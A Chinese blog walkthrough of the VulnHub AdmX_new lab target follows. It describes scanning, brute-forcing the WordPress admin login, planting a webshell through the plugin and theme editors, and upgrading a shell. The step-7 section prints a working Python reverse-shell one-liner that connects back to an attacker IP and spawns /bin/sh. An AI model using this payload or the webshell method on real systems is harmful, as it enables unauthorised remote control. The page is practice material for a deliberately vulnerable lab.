AdmX_new靶机打靶过程及思路

原创 已于 2022-07-22 18:00:32 修改 · 2.6k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

于 2022-04-11 15:38:52 首次发布
本文详细记录了一次渗透测试的过程,从使用nmap进行主机发现,到feroxbuster路径发现,再到密码爆破、木马植入和交互式shell获取。通过数据库尝试提权,最终成功获取root权限,实现系统完全控制。过程中涉及多种工具和技术,如nmap、feroxbuster、bash shell交互等。

1.首先使用nmap -sn 来进行主机发现

nmap -sn 10.0.2.4/24

2.进行服务探针

3.使用feroxbuster进行路径发现

feroxbuster --url http://10.0.2.9

4.进入后台管理页面,进行密码爆破

5.进入后台后,media上传马,plugin插件上传,appearance里面修改404页面代码插入木马

6.通过编写插件上传

7.访问插件目录,传参命令执行获取反弹shell
python3 -c ‘import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect((“10.0.2.15”,5555));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call([“/bin/sh”,“-i”]);’

8.发现bash指令受限,开始更改为交互式的shell (只适用于bshell)
ctrl+z 将获得的shell进程隐藏
stty raw -echo stty echo 取消不显设置 rstty时一个用来改变并打印终端行设置的常用命令。
fg 将后台的命令调到前台来 发现仍然无法正常执行,原因是因为kali
上面用的是zshell不是bshell,但是目标靶机上用的是bshell
chsh -s /bin/bash 将kali上的zshell改为bshell
ctrl+r 重启kali
echo $SHELL 得到bashell

重启后:stty raw -echo
这个地方如果出现执行后无法执行命令,输入python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
就可以得到www-data@wp:/var/www/html/wordpress$
exp

最低0.47元/天 解锁文章
zsszjybb
关注
AdmX_new靶场
zjxxxy的博客
06-15 327
vulnhub靶场AdmX_new攻略
AdmX_new靶机渗透过程
捣蛋鬼
04-02 5380
文章目录前言一、主机发现/端口扫描二、路径爆破/匹配替换三、密码爆破获得admin密码四、漏洞利用五、密码重用/MySQL提权总结 前言 靶机地址:https://download.vulnhub.com/admx/AdmX_new.7z 难度:中(2个flag和root权限) kali:10.0.2.4 靶机:10.0.2.7 192.168.159.145
AdmX_new打靶记录
wwd180的博客
06-16 231
实验主机:攻击机kali(192.168.109.131)靶机AdmX_new(192.168.109.134)实验目标:获取root权限 + 2 flag实验网络:NAT。
AdmX_new靶机
weixin_45691672的博客
06-16 986
实验主机:AdmX_new靶机一台/Kali linux攻击机一台AdmX_new靶机 IP:192.168.3.9Kali linux攻击机 IP:192.168.3.32实验网络:桥接模式实验目标:获取靶机的Root权限。
vulnhub靶机--AdmX_new
weixin_46107179的博客
04-08 4066
靶机下载地址:靶机下载 主机发现 通过nmap扫描得到主机IP地址 信息搜集 通过nmap对IP地址扫描,得到信息,只有80端口 然后通过浏览器访问,发现只有Ubuntu的默认页面,于是利用feroxbuster -u http://192.168.137.145:80 扫描目录,发现是WordPress框架,但有很多重定向的url 于是用burpsuite来抓取一下这个数据包来分析,发现这写重定向都是定向到另外一个ip 需要通过burpsuite里面的proxy模块的options功能,将其响应头
t6AdmX_new靶机
08-03
t6AdmX_new靶机
kali之vulnhub,Admx_new
weixin_54431413的博客
05-11 865
一、靶场环境部署 二、主机发现 三、端口扫描 四、服务版本扫描 五、登录开启的服务端口 六、进行目录扫描 七、暴力破解 八、利用wordpress后台 九、拿下wpadmin的shell
Admx_new
果粒程
11-22 518
Admx_new
Admx_new靶机之BurpSuite内容替换、MSF漏洞利用、Wordpress后台漏洞利用、蚁剑上线、利用MySQL提权
qq_40898302的博客
05-12 794
1) Ctrl + Z 将shell放置后台 2) 输入 stty raw -echo 3) 输入 fg 将后台进程调用到前台 4) 关闭所有程序 5) 确定kali有bash ls /bin/bash 6) 将 zsh 改成 bsh sudo chsh -s /bin/bash 7) 重启 8) 输入 echo $SHELL 显示 /bin/bash 成功 9) 重新监听。有的系统漏洞只能触发一次,所以打点成功,基于这个shell获取更多的shell,利用多种方式,多种途径去获得更多的shell。
AdmX_new
最新发布
guowu666的博客
10-13 817
vulnhub 靶场 AdmX_new
VulnHub-AdmX_new靶机渗透详解
大熊
06-16 414
BP自动替换、另类提权方法
靶机-AdmX_new
weixin_58602402的博客
06-16 287
利用bp将这个ip进行替换成靶机IP,到Proxy下的Options下的Match and Replace,先把里面的所有内容Remove掉。发现页面访问缓慢,F12进行查看,发现对ip192.168.159.145进行请求,没有这个ip。4.利用工具直接对wordpress后台密码进行爆破,admin/adam14。2.尝试登陆数据库失败,尝试直接切换用户wpadmin/adam14进行登陆。1.对目标站点进行目录扫描,发现wordpress目录。目录:/var/www/html/wordpress。
vulnhub靶场-AdmX
qq_42947816的博客
05-29 1663
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
vulhub之AdmX_new
qq_48746414的博客
06-12 961
记一次vulhub靶场过程
打靶记录4——靶机AdmX_new
Fab1an的博客
07-31 2312
先对该靶机进行了主机发现和端口扫描,只发现了一个80端口,这是我们唯一的攻击方式浏览器访问发现只有一个Apache的页面,于是我们对目标的Web服务进行路径的爆破,发现了WordPress但是发现加载速度很慢,于是使用BurpSuite进行抓取和分析整个Web请求的所有流量,发现是在页面上通过硬编码的方式写死了一些IP地址,于是通过BurpSuite的匹配和替换,也就是Match And Replace这样的一个功能,将写死的IP地址替换成目标靶机的IP地址,从而可以比较流畅的打开Web页面。
AdmX_new(Wordpress getshell & 二次提权)
weixin_46591320的博客
11-26 1714
Wordpress getshell
Vulnhun_ADMX: 1.0.1
qq_45434762的博客
05-16 474
主机信息kali: 192.168.254.135 ADMX:: 192.168.254.159 信息收集通过nmap扫描目标主机发现只开放了80端口nmap -T4 -p- -A -v...
t6AdmX_new靶机:全方位安全探测与WordPress漏洞挖掘
在整个过程中,用户以专业的方法运用t6AdmX_new靶机,不仅关注基础的网络通信,还关注动态行为分析,确保在安全测试中能够全面评估目标系统的脆弱性和安全性。同时,注意遵守道德准则,确保测试活动在合法范围内进行...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值